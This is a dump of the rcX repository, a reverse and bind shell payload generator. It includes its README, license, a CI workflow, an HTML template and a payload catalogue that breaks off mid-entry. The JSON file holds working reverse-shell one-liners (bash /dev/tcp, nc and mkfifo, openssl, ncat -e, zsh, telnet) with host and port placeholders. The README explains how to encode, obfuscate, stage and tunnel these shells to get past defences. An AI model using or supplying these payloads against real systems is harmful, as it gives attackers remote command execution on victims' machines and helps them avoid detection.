├── .github └── workflows │ └── build.yml ├── .gitignore ├── LICENSE ├── README.md ├── index_template.html ├── payloads_template.json ├── payloads_template.yml ├── rcX-png ├── favicon.ico ├── logo.png ├── rcx-main.png ├── rcx-obf.png ├── rcx-online-curl.gif ├── rcx-staged.png ├── rcx-table.png ├── rcx-web-cli.png └── rcxonline.gif ├── rcX.py └── requirements.txt /.github/workflows/build.yml: -------------------------------------------------------------------------------- 1 | # This is a basic workflow to help you get started with Actions 2 | 3 | name: Build 4 | 5 | # Controls when the workflow will run 6 | on: 7 | # Triggers the workflow on push or pull request events but only for the main branch 8 | push: 9 | branches: [ main ] 10 | pull_request: 11 | branches: [ main ] 12 | 13 | # Allows you to run this workflow manually from the Actions tab 14 | workflow_dispatch: 15 | 16 | # A workflow run is made up of one or more jobs that can run sequentially or in parallel 17 | jobs: 18 | # This workflow contains a single job called "build" 19 | build: 20 | # The type of runner that the job will run on 21 | runs-on: ubuntu-latest 22 | 23 | # Steps represent a sequence of tasks that will be executed as part of the job 24 | steps: 25 | # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it 26 | - uses: actions/checkout@v2 27 | 28 | # Runs a single command using the runners shell 29 | - name: Run a one-line script 30 | run: echo Hello, world! 31 | 32 | # Runs a set of commands using the runners shell 33 | - name: Run a multi-line script 34 | run: | 35 | echo Add other actions to build, 36 | echo test, and deploy your project. 37 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | 131 | *.png binary -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 2, June 1991 3 | 4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc., 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | Preamble 10 | 11 | The licenses for most software are designed to take away your 12 | freedom to share and change it. By contrast, the GNU General Public 13 | License is intended to guarantee your freedom to share and change free 14 | software--to make sure the software is free for all its users. This 15 | General Public License applies to most of the Free Software 16 | Foundation's software and to any other program whose authors commit to 17 | using it. (Some other Free Software Foundation software is covered by 18 | the GNU Lesser General Public License instead.) You can apply it to 19 | your programs, too. 20 | 21 | When we speak of free software, we are referring to freedom, not 22 | price. Our General Public Licenses are designed to make sure that you 23 | have the freedom to distribute copies of free software (and charge for 24 | this service if you wish), that you receive source code or can get it 25 | if you want it, that you can change the software or use pieces of it 26 | in new free programs; and that you know you can do these things. 27 | 28 | To protect your rights, we need to make restrictions that forbid 29 | anyone to deny you these rights or to ask you to surrender the rights. 30 | These restrictions translate to certain responsibilities for you if you 31 | distribute copies of the software, or if you modify it. 32 | 33 | For example, if you distribute copies of such a program, whether 34 | gratis or for a fee, you must give the recipients all the rights that 35 | you have. You must make sure that they, too, receive or can get the 36 | source code. And you must show them these terms so they know their 37 | rights. 38 | 39 | We protect your rights with two steps: (1) copyright the software, and 40 | (2) offer you this license which gives you legal permission to copy, 41 | distribute and/or modify the software. 42 | 43 | Also, for each author's protection and ours, we want to make certain 44 | that everyone understands that there is no warranty for this free 45 | software. If the software is modified by someone else and passed on, we 46 | want its recipients to know that what they have is not the original, so 47 | that any problems introduced by others will not reflect on the original 48 | authors' reputations. 49 | 50 | Finally, any free program is threatened constantly by software 51 | patents. We wish to avoid the danger that redistributors of a free 52 | program will individually obtain patent licenses, in effect making the 53 | program proprietary. To prevent this, we have made it clear that any 54 | patent must be licensed for everyone's free use or not licensed at all. 55 | 56 | The precise terms and conditions for copying, distribution and 57 | modification follow. 58 | 59 | GNU GENERAL PUBLIC LICENSE 60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 61 | 62 | 0. This License applies to any program or other work which contains 63 | a notice placed by the copyright holder saying it may be distributed 64 | under the terms of this General Public License. The "Program", below, 65 | refers to any such program or work, and a "work based on the Program" 66 | means either the Program or any derivative work under copyright law: 67 | that is to say, a work containing the Program or a portion of it, 68 | either verbatim or with modifications and/or translated into another 69 | language. (Hereinafter, translation is included without limitation in 70 | the term "modification".) Each licensee is addressed as "you". 71 | 72 | Activities other than copying, distribution and modification are not 73 | covered by this License; they are outside its scope. The act of 74 | running the Program is not restricted, and the output from the Program 75 | is covered only if its contents constitute a work based on the 76 | Program (independent of having been made by running the Program). 77 | Whether that is true depends on what the Program does. 78 | 79 | 1. You may copy and distribute verbatim copies of the Program's 80 | source code as you receive it, in any medium, provided that you 81 | conspicuously and appropriately publish on each copy an appropriate 82 | copyright notice and disclaimer of warranty; keep intact all the 83 | notices that refer to this License and to the absence of any warranty; 84 | and give any other recipients of the Program a copy of this License 85 | along with the Program. 86 | 87 | You may charge a fee for the physical act of transferring a copy, and 88 | you may at your option offer warranty protection in exchange for a fee. 89 | 90 | 2. You may modify your copy or copies of the Program or any portion 91 | of it, thus forming a work based on the Program, and copy and 92 | distribute such modifications or work under the terms of Section 1 93 | above, provided that you also meet all of these conditions: 94 | 95 | a) You must cause the modified files to carry prominent notices 96 | stating that you changed the files and the date of any change. 97 | 98 | b) You must cause any work that you distribute or publish, that in 99 | whole or in part contains or is derived from the Program or any 100 | part thereof, to be licensed as a whole at no charge to all third 101 | parties under the terms of this License. 102 | 103 | c) If the modified program normally reads commands interactively 104 | when run, you must cause it, when started running for such 105 | interactive use in the most ordinary way, to print or display an 106 | announcement including an appropriate copyright notice and a 107 | notice that there is no warranty (or else, saying that you provide 108 | a warranty) and that users may redistribute the program under 109 | these conditions, and telling the user how to view a copy of this 110 | License. (Exception: if the Program itself is interactive but 111 | does not normally print such an announcement, your work based on 112 | the Program is not required to print an announcement.) 113 | 114 | These requirements apply to the modified work as a whole. If 115 | identifiable sections of that work are not derived from the Program, 116 | and can be reasonably considered independent and separate works in 117 | themselves, then this License, and its terms, do not apply to those 118 | sections when you distribute them as separate works. But when you 119 | distribute the same sections as part of a whole which is a work based 120 | on the Program, the distribution of the whole must be on the terms of 121 | this License, whose permissions for other licensees extend to the 122 | entire whole, and thus to each and every part regardless of who wrote it. 123 | 124 | Thus, it is not the intent of this section to claim rights or contest 125 | your rights to work written entirely by you; rather, the intent is to 126 | exercise the right to control the distribution of derivative or 127 | collective works based on the Program. 128 | 129 | In addition, mere aggregation of another work not based on the Program 130 | with the Program (or with a work based on the Program) on a volume of 131 | a storage or distribution medium does not bring the other work under 132 | the scope of this License. 133 | 134 | 3. You may copy and distribute the Program (or a work based on it, 135 | under Section 2) in object code or executable form under the terms of 136 | Sections 1 and 2 above provided that you also do one of the following: 137 | 138 | a) Accompany it with the complete corresponding machine-readable 139 | source code, which must be distributed under the terms of Sections 140 | 1 and 2 above on a medium customarily used for software interchange; or, 141 | 142 | b) Accompany it with a written offer, valid for at least three 143 | years, to give any third party, for a charge no more than your 144 | cost of physically performing source distribution, a complete 145 | machine-readable copy of the corresponding source code, to be 146 | distributed under the terms of Sections 1 and 2 above on a medium 147 | customarily used for software interchange; or, 148 | 149 | c) Accompany it with the information you received as to the offer 150 | to distribute corresponding source code. (This alternative is 151 | allowed only for noncommercial distribution and only if you 152 | received the program in object code or executable form with such 153 | an offer, in accord with Subsection b above.) 154 | 155 | The source code for a work means the preferred form of the work for 156 | making modifications to it. For an executable work, complete source 157 | code means all the source code for all modules it contains, plus any 158 | associated interface definition files, plus the scripts used to 159 | control compilation and installation of the executable. However, as a 160 | special exception, the source code distributed need not include 161 | anything that is normally distributed (in either source or binary 162 | form) with the major components (compiler, kernel, and so on) of the 163 | operating system on which the executable runs, unless that component 164 | itself accompanies the executable. 165 | 166 | If distribution of executable or object code is made by offering 167 | access to copy from a designated place, then offering equivalent 168 | access to copy the source code from the same place counts as 169 | distribution of the source code, even though third parties are not 170 | compelled to copy the source along with the object code. 171 | 172 | 4. You may not copy, modify, sublicense, or distribute the Program 173 | except as expressly provided under this License. Any attempt 174 | otherwise to copy, modify, sublicense or distribute the Program is 175 | void, and will automatically terminate your rights under this License. 176 | However, parties who have received copies, or rights, from you under 177 | this License will not have their licenses terminated so long as such 178 | parties remain in full compliance. 179 | 180 | 5. You are not required to accept this License, since you have not 181 | signed it. However, nothing else grants you permission to modify or 182 | distribute the Program or its derivative works. These actions are 183 | prohibited by law if you do not accept this License. Therefore, by 184 | modifying or distributing the Program (or any work based on the 185 | Program), you indicate your acceptance of this License to do so, and 186 | all its terms and conditions for copying, distributing or modifying 187 | the Program or works based on it. 188 | 189 | 6. Each time you redistribute the Program (or any work based on the 190 | Program), the recipient automatically receives a license from the 191 | original licensor to copy, distribute or modify the Program subject to 192 | these terms and conditions. You may not impose any further 193 | restrictions on the recipients' exercise of the rights granted herein. 194 | You are not responsible for enforcing compliance by third parties to 195 | this License. 196 | 197 | 7. If, as a consequence of a court judgment or allegation of patent 198 | infringement or for any other reason (not limited to patent issues), 199 | conditions are imposed on you (whether by court order, agreement or 200 | otherwise) that contradict the conditions of this License, they do not 201 | excuse you from the conditions of this License. If you cannot 202 | distribute so as to satisfy simultaneously your obligations under this 203 | License and any other pertinent obligations, then as a consequence you 204 | may not distribute the Program at all. For example, if a patent 205 | license would not permit royalty-free redistribution of the Program by 206 | all those who receive copies directly or indirectly through you, then 207 | the only way you could satisfy both it and this License would be to 208 | refrain entirely from distribution of the Program. 209 | 210 | If any portion of this section is held invalid or unenforceable under 211 | any particular circumstance, the balance of the section is intended to 212 | apply and the section as a whole is intended to apply in other 213 | circumstances. 214 | 215 | It is not the purpose of this section to induce you to infringe any 216 | patents or other property right claims or to contest validity of any 217 | such claims; this section has the sole purpose of protecting the 218 | integrity of the free software distribution system, which is 219 | implemented by public license practices. Many people have made 220 | generous contributions to the wide range of software distributed 221 | through that system in reliance on consistent application of that 222 | system; it is up to the author/donor to decide if he or she is willing 223 | to distribute software through any other system and a licensee cannot 224 | impose that choice. 225 | 226 | This section is intended to make thoroughly clear what is believed to 227 | be a consequence of the rest of this License. 228 | 229 | 8. If the distribution and/or use of the Program is restricted in 230 | certain countries either by patents or by copyrighted interfaces, the 231 | original copyright holder who places the Program under this License 232 | may add an explicit geographical distribution limitation excluding 233 | those countries, so that distribution is permitted only in or among 234 | countries not thus excluded. In such case, this License incorporates 235 | the limitation as if written in the body of this License. 236 | 237 | 9. The Free Software Foundation may publish revised and/or new versions 238 | of the General Public License from time to time. Such new versions will 239 | be similar in spirit to the present version, but may differ in detail to 240 | address new problems or concerns. 241 | 242 | Each version is given a distinguishing version number. If the Program 243 | specifies a version number of this License which applies to it and "any 244 | later version", you have the option of following the terms and conditions 245 | either of that version or of any later version published by the Free 246 | Software Foundation. If the Program does not specify a version number of 247 | this License, you may choose any version ever published by the Free Software 248 | Foundation. 249 | 250 | 10. If you wish to incorporate parts of the Program into other free 251 | programs whose distribution conditions are different, write to the author 252 | to ask for permission. For software which is copyrighted by the Free 253 | Software Foundation, write to the Free Software Foundation; we sometimes 254 | make exceptions for this. Our decision will be guided by the two goals 255 | of preserving the free status of all derivatives of our free software and 256 | of promoting the sharing and reuse of software generally. 257 | 258 | NO WARRANTY 259 | 260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 268 | REPAIR OR CORRECTION. 269 | 270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 278 | POSSIBILITY OF SUCH DAMAGES. 279 | 280 | END OF TERMS AND CONDITIONS 281 | 282 | How to Apply These Terms to Your New Programs 283 | 284 | If you develop a new program, and you want it to be of the greatest 285 | possible use to the public, the best way to achieve this is to make it 286 | free software which everyone can redistribute and change under these terms. 287 | 288 | To do so, attach the following notices to the program. It is safest 289 | to attach them to the start of each source file to most effectively 290 | convey the exclusion of warranty; and each file should have at least 291 | the "copyright" line and a pointer to where the full notice is found. 292 | 293 | 294 | Copyright (C) 295 | 296 | This program is free software; you can redistribute it and/or modify 297 | it under the terms of the GNU General Public License as published by 298 | the Free Software Foundation; either version 2 of the License, or 299 | (at your option) any later version. 300 | 301 | This program is distributed in the hope that it will be useful, 302 | but WITHOUT ANY WARRANTY; without even the implied warranty of 303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 304 | GNU General Public License for more details. 305 | 306 | You should have received a copy of the GNU General Public License along 307 | with this program; if not, write to the Free Software Foundation, Inc., 308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. 309 | 310 | Also add information on how to contact you by electronic and paper mail. 311 | 312 | If the program is interactive, make it output a short notice like this 313 | when it starts in an interactive mode: 314 | 315 | Gnomovision version 69, Copyright (C) year name of author 316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 317 | This is free software, and you are welcome to redistribute it 318 | under certain conditions; type `show c' for details. 319 | 320 | The hypothetical commands `show w' and `show c' should show the appropriate 321 | parts of the General Public License. Of course, the commands you use may 322 | be called something other than `show w' and `show c'; they could even be 323 | mouse-clicks or menu items--whatever suits your program. 324 | 325 | You should also get your employer (if you work as a programmer) or your 326 | school, if any, to sign a "copyright disclaimer" for the program, if 327 | necessary. Here is a sample; alter the names: 328 | 329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 330 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 331 | 332 | , 1 April 1989 333 | Ty Coon, President of Vice 334 | 335 | This General Public License does not permit incorporating your program into 336 | proprietary programs. If your program is a subroutine library, you may 337 | consider it more useful to permit linking proprietary applications with the 338 | library. If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. 340 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | [![Build](https://github.com/FlyfishSec/rcX/actions/workflows/build.yml/badge.svg)](https://github.com/FlyfishSec/rcX/actions/workflows/build.yml) 3 | [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.6|3.7|3.8|3.9|3.10-green.svg?logo=python&logoColor=yellow)](https://www.python.org/) 4 | [![GitHub release](https://img.shields.io/github/v/tag/FlyfishSec/rcX.svg?label=release&color=green)](https://github.com/FlyfishSec/rcX/releases) 5 | [![GitHub downloads](https://img.shields.io/github/downloads/flyfishSec/rcX/total?color=cyan)](https://github.com/FlyfishSec/rcX/releases) 6 | [![License](https://img.shields.io/badge/license-GPLv2-red.svg?color=green)](https://cdn.rawgit.com/FlyfishSec/rcX/main/LICENSE) 7 | # [](https://github.com/FlyfishSec/rcX/releases) 8 | ## [rcxonline.cf](https://rcxonline.cf)/[rcxonline.ml](https://rcxonline.ml) 9 | 10 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcxonline.gif "rcX") 11 | 12 | ## curl 13 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-online-curl.gif) 14 | 15 | ## What is rcX? 16 | ### "rc" - stands for remote command or remote code. 17 | ### "X" - you can understand as assistant or tool. 18 | 19 | The predecessor of rcX is rsGen(A Reverse Shell Payload Generator). Currently, it is a powerful Reverse/Bind shell Generator. 20 | More features will be added in the future. 21 | 22 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-main.png "rcX") 23 | 24 | ## Local use 25 | `pip install -r requirements.txt` 26 | or Download the packaged binaries 27 | ### CLI Usage 28 | #### Example: 29 | ##### 1.Get a bash reverse shell and output in tabular format. 30 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --table` 31 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-table.png "rcX") 32 | ##### 2.Custom shell path. 33 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash -s "/bin/sh"` 34 | ##### 3.Copy the specified id payload to the clipboard. 35 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --table -c 5` 36 | ##### 4.Get a base64 encoded bash reverse shell. 37 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash -e base64` 38 | ##### 5.Get a xor encoded and obfuscated bash reverse shell. 39 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash -e xor --obf reverse --table --clip 7` 40 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-obf.png "rcX") 41 | ##### 6.Get a staging bash reverse shell. 42 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --staging-url 0 --staging-cmd 0` 43 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-staged.png "rcX") 44 | ##### 7.Get a staging bash reverse shell and forward local port using ngrok tunnel. 45 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --tunnel ngrok_jp` 46 | ##### 8.Get a Windows Powershell reverse shell. 47 | `python rcX.py -l 127.0.0.1 -p 8888 -t powershell -P windows` 48 | #### ... 49 | 50 | ### Web UI 51 | > At the same time, rcX also provides a web interface. 52 | Use rcX as a server then you can use it with your team or friends. 53 | 54 | > Tip: When rcX is running as a server, if the request origin is not 127.0.0.1 or localhost, the ngrok tunnel feature will be disabled and the related options will be hidden on the Front-end 55 | 56 | #### Example: 57 | `python rcX.py -w` 58 | 59 | ### Web CLI 60 | > When rcX is running as a server, you can use curl in terminal to get the payload. 61 | #### Example: 62 | ##### 1.Get a bash reverse shell payload 63 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888` 64 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-web-cli.png "rcX") 65 | ##### 2.Base64 encoded 66 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64` 67 | 68 | ##### 3.Base64 and hex encoded 69 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64,hex` 70 | 71 | ##### 4.Gzip compress and replace_char(obfuscation method) 72 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/gzip/replace_char` 73 | 74 | ##### 5.xor encoded and reverse(obfuscation method) 75 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/xor/reverse` 76 | 77 | ##### 6.Get a Windows powershell reverse shell payload 78 | `curl http://127.0.0.1/windows/powershell/127.0.0.4/44444` 79 | 80 | ##### 7.replace_char(obfuscation method) only without using encoder 81 | `curl http://127.0.0.1/windows/powershell/127.0.0.4/44444/,/replace_char` 82 | 83 | ##### 8.Only use staging, without any encoder and obfuscator 84 | `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/,/,/1/1` 85 | 86 | ##### 9.Get a bind linux netcat shell payload 87 | `curl http://127.0.0.1/bind/linux/netcat/127.0.0.4/8888` 88 | 89 | 90 | ## Support rcX 91 | 92 | |Bitcoin Address QR Code|Ethereum Address QR Code|Monero Address QR Code|DOGECOIN Address QR Code| 93 | |:--------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------:| 94 | | | | | | 95 | 96 | *BTC*: 3F2R6KMXbJ576yJNJpjrBnhVG64Ltg1WoF 97 | 98 | *ETH*: 0xab15323b0c7721B6B9fDf5A8089a6Ec697C9feED 99 | 100 | *XMR*: 48rBRHh2iV27oHzXMGnjbwCLLyinpqFry6gLTAaQiFVtMRw4kqabeoFiBYqNAPCBHbKjgQezPNLwDihMSNbEPCuYP1xzCWi 101 | 102 | *Dogecoin*: DBQATuB7t4wk56dwFqcGdqQtY8BSjL77if 103 | 104 | 105 | -------------------------------------------------------------------------------- /index_template.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 63 | 64 | 65 | 66 |

rcX - Shell Generator

67 |
68 |
69 |
70 |
Host
71 | 72 |
Port
73 | 74 |
Shell Type
75 | 92 |
Platform
93 | 97 |
Password
98 | 99 | 100 |
101 |
102 |
103 |
Direction
104 | 108 |
Protocol
109 | 117 |
Shell Path
118 | 119 |
BinaryName
120 | 121 |
122 |
123 |
Interactive Mode
124 | 129 |
Encryption
130 | 135 |
StagingUrl
136 | 150 |
StagingCmd
151 | 168 |
169 |
170 |
Encoder
171 | 183 |
184 |
185 |
Obfuscator
186 | 191 |
IPObfuscator
192 | 198 |
localtunnel
199 | 210 |
211 |
212 |
213 |
214 |
Test Terminal
215 | 224 |
225 |
226 | 229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 | 269 |
270 | 271 | 272 | -------------------------------------------------------------------------------- /payloads_template.json: -------------------------------------------------------------------------------- 1 | { 2 | "reverse": { 3 | "bash": { 4 | "Bash-i": "{shell_path} -i >& /dev/{protocol}/{host}/{port} 0>&1", 5 | "Bash-l": "{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1", 6 | "Bash-p": "{shell_path} -p >& /dev/{protocol}/{host}/{port} 0>&1", 7 | "Bash-c": "{shell_path} -c '{shell_path} -l >& /dev/{protocol}/{host}/{port} 0>&1'", 8 | "Bash196": "0<&196;exec 196<>/dev/{protocol}/{host}/{port}; sh <&196 >&196 2>&196", 9 | "Bash-readline": "exec 5<>/dev/{protocol}/{host}/{port}; while read line 0<&5; do $line 2>&5 >&5; done", 10 | "Bash5": "{shell_path} -i 5<> /dev/{protocol}/{host}/{port} 0<&5 1>&5 2>&5", 11 | "zsh": "zsh -c 'zmodload zsh/net/tcp && ztcp {host} {port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'" 12 | }, 13 | "bash-password": { 14 | "Bash-i": "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' >& /dev/{protocol}/{host}/{port} 0>&1", 15 | "Bash-l": "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -l;esac' >& /dev/{protocol}/{host}/{port} 0>&1", 16 | "Bash-p": "{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -p;esac' >& /dev/{protocol}/{host}/{port} 0>&1" 17 | }, 18 | "bash-ssl": { 19 | "Bash-i": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f", 20 | "Bash-l": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -l 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f", 21 | "Bash-p": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -p 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f" 22 | }, 23 | "bash-ssl-password": { 24 | "Bash-i": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f", 25 | "Bash-l": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -l;esac' 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f", 26 | "Bash-p": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -p;esac' 2>&1|openssl s_client -quiet -connect {host}:{port} >/tmp/f" 27 | }, 28 | "netcat": { 29 | "nc": "{binary_name} -e {shell_path} {host} {port}{nc_args}", 30 | "nc-c": "{binary_name} {host} {port} -c {shell_path}{nc_args}", 31 | "ncat": "ncat -e {shell_path} {host} {port}{ncat_args}", 32 | "ncat-c": "ncat -c {shell_path} {host} {port}{ncat_args}", 33 | "nc-mkfifo": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|{binary_name} {host} {port} >/tmp/f", 34 | "nc-mknod": "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -i 2>&1|{binary_name} {host} {port} >/tmp/f", 35 | "DotnetCat": "dncat -e {shell_path} {host} -p {port}" 36 | }, 37 | "netcat-windows": { 38 | "nc": "{binary_name} -e {shell_path} {host} {port}{nc_args}", 39 | "nc-c": "{binary_name} {host} {port} -c {shell_path}{nc_args}", 40 | "ncat": "ncat -e {shell_path} {host} {port}{ncat_args}", 41 | "ncat-c": "ncat -c {shell_path} {host} {port}{ncat_args}", 42 | "DotnetCat": "dncat -e {shell_path} {host} -p {port}" 43 | }, 44 | "netcat-password": { 45 | "nc-c": "nc -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' {host} {port}", 46 | "ncat-c": "ncat -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' {host} {port}", 47 | "nc-mkfifo": "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in '{password}')bash -i;esac' 2>&1|{binary_name} {host} {port} >/tmp/f", 48 | "nc-mknod": "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read k;case $k in \"{password}\")bash -i;esac' 2>&1|{binary_name} {host} {port} >/tmp/f" 49 | }, 50 | "netcat-ssl": { 51 | "ncat": "ncat -e {shell_path} {host} {port} --ssl", 52 | "ncat-c": "ncat -c {shell_path} {host} {port} --ssl" 53 | }, 54 | "netcat-ssl-password": { 55 | "ncat-c": "ncat --ssl -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' {host} {port}" 56 | }, 57 | "netcat-windows-password": { 58 | "ncat-c": "{binary_name}{ncat_args} -c \"echo|set /p=%random%=&powershell $k=Read-Host;write-host $k=;if($k -eq '{password}'){{{shell_path}}}\" {host} {port}" 59 | }, 60 | "telnet-linux": { 61 | "telnet": "rm -f /tmp/p;mknod /tmp/p p && {binary_name} {host} {port} 0/tmp/p", 62 | "telnet-two_ports": "{binary_name} {host} 